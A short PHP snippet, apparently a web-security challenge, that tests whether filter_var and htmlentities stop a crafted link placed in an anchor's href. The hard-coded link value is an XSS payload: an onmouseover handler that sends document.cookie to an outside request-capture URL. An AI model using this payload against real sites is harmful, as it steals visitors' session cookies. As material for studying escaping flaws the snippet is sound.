- filter_var: documentation ( source)
- htmlentities: documentation ( source)
- printf: documentation ( source)
<?php
function safeHTML($var)
{
return htmlentities($var);
}
$link = 'http://moncul.com/toto.jpg\\"onmouseover=javascript:window.location=\"http://requestb.in/sr3wb0sr?flag=\"+(document.cookie);';
if (!is_null($link))
{
if (!filter_var($link, FILTER_VALIDATE_URL))
printf("ERROR !");
}
if (is_null($link))
{
$link = 'http://';
printf("NULL !");
}
printf('<a href="%s">'."link".'</a>', safeHTML($link));
?>